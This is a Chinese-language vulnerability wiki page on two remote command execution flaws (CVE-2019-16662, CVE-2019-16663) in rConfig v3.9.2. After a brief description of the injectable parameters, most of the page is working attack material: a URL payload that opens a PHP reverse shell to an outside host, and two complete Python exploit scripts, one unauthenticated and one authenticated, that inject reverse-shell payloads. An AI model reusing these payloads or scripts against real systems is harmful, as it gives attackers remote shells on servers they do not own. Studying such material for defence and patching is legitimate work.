menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right rConfig chevron_right (CVE-2019-16662)(CVE-2019-16663)rConfig v3.9.2 远程命令执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-16662)(CVE-2019-16663)rConfig v3.9.2 远程命令执行.md
    4.62 KB / 2021-04-21 09:23:46
        (CVE-2019-16662)(CVE-2019-16663)rConfig v3.9.2 远程命令执行
    ===============================================================
    
    一、漏洞简介
    ------------
    
    我在两个文件中分别发现了两个远程代码执行漏洞。第一个是ajaxServerSettingsChk.php,攻击者可以通过rootUname参数发送精心构造的一个GET请求,触发未授权RCE漏洞。rootUname参数在源文件第2行中定义,随后会在第13行传递给exec函数,攻击者可以构造参数接收内容实现让操作系统执行恶意命令。这个漏洞很容易利用和发现,后面的篇幅中我将介绍如何发现并利用这个漏洞。
    
    第二个漏洞是在search.crud.php发现的,这文件需要通过身份验证才能触发远程代码执行漏洞。这个漏洞可以通过构造一个包含有两个参数的GET请求触发,其中searchTerm参数可以包含任意值,但该参数必须存在,才能执行到第63行的exec函数。
    
    二、漏洞影响
    ------------
    
    rConfig v3.9.2
    
    三、复现过程
    ------------
    
        https://www.0-sec.org/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=`php -r '$sock=fsockopen("1.2.3.4",1234);exec("/bin/sh -i <&3 >&3 2>&3");'`
    
    ![](./resource/(CVE-2019-16662)(CVE-2019-16663)rConfigv3.9.2远程命令执行/media/rId24.png)
    
    pyton脚本一
    
        #!/usr/bin/python
    
        # Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution
        # Date: 18/09/2019
        # Exploit Author: Askar (@mohammadaskar2)
        # CVE : CVE-2019-16662
        # Vendor Homepage: https://rconfig.com/
        # Software link: https://rconfig.com/download
        # Version: v3.9.2
        # Tested on: CentOS 7.7 / PHP 7.2.22
    
        import requests
        import sys
        from urllib import quote
        from requests.packages.urllib3.exceptions import InsecureRequestWarning
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
        if len(sys.argv) != 4:
            print "[+] Usage : ./exploit.py target ip port"
            exit()
    
        target = sys.argv[1]
    
        ip = sys.argv[2]
    
        port = sys.argv[3]
    
        payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'#'''.format(ip, port))
    
        install_path = target + "/install"
    
        req = requests.get(install_path, verify=False)
        if req.status_code == 404:
            print "[-] Installation directory not found!"
            print "[-] Exploitation failed !"
            exit()
        elif req.status_code == 200:
            print "[+] Installation directory found!"
        url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload
    
        print "[+] Triggering the payload"
        print "[+] Check your listener !"
    
        requests.get(url_to_send, verify=False)
    
    ![](./resource/(CVE-2019-16662)(CVE-2019-16663)rConfigv3.9.2远程命令执行/media/rId25.png)
    
    python脚本二
    
        #!/usr/bin/python
    
        # Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution
        # Date: 18/09/2019
        # Exploit Author: Askar (@mohammadaskar2)
        # CVE : CVE-2019-16663
        # Vendor Homepage: https://rconfig.com/
        # Software link: https://rconfig.com/download
        # Version: v3.9.2
        # Tested on: CentOS 7.7 / PHP 7.2.22
    
    
        import requests
        import sys
        from urllib import quote
        from requests.packages.urllib3.exceptions import InsecureRequestWarning
    
    
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
        if len(sys.argv) != 6:
            print "[+] Usage : ./exploit.py target username password ip port"
            exit()
    
        target = sys.argv[1]
    
        username = sys.argv[2]
    
        password = sys.argv[3]
    
        ip = sys.argv[4]
    
        port = sys.argv[5]
    
        request = requests.session()
    
        login_info = {
            "user": username,
            "pass": password,
            "sublogin": 1
        }
    
        login_request = request.post(
            target+"/lib/crud/userprocess.php",
             login_info,
             verify=False,
             allow_redirects=True
         )
    
        dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
    
    
        if dashboard_request.status_code == 200:
            print "[+] LoggedIn successfully"
            payload = '''""&amp;&amp;php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'#'''.format(ip, port)
            encoded_request = target+"/lib/crud/search.crud.php?searchTerm=anything&amp;catCommand={0}".format(quote(payload))
            print "[+] triggering the payload"
            print "[+] Check your listener !"
            exploit_req = request.get(encoded_request)
    
        elif dashboard_request.status_code == 302:
            print "[-] Wrong credentials !"
            exit()
    
    ![](./resource/(CVE-2019-16662)(CVE-2019-16663)rConfigv3.9.2远程命令执行/media/rId26.png)
    
    
    links
    file_download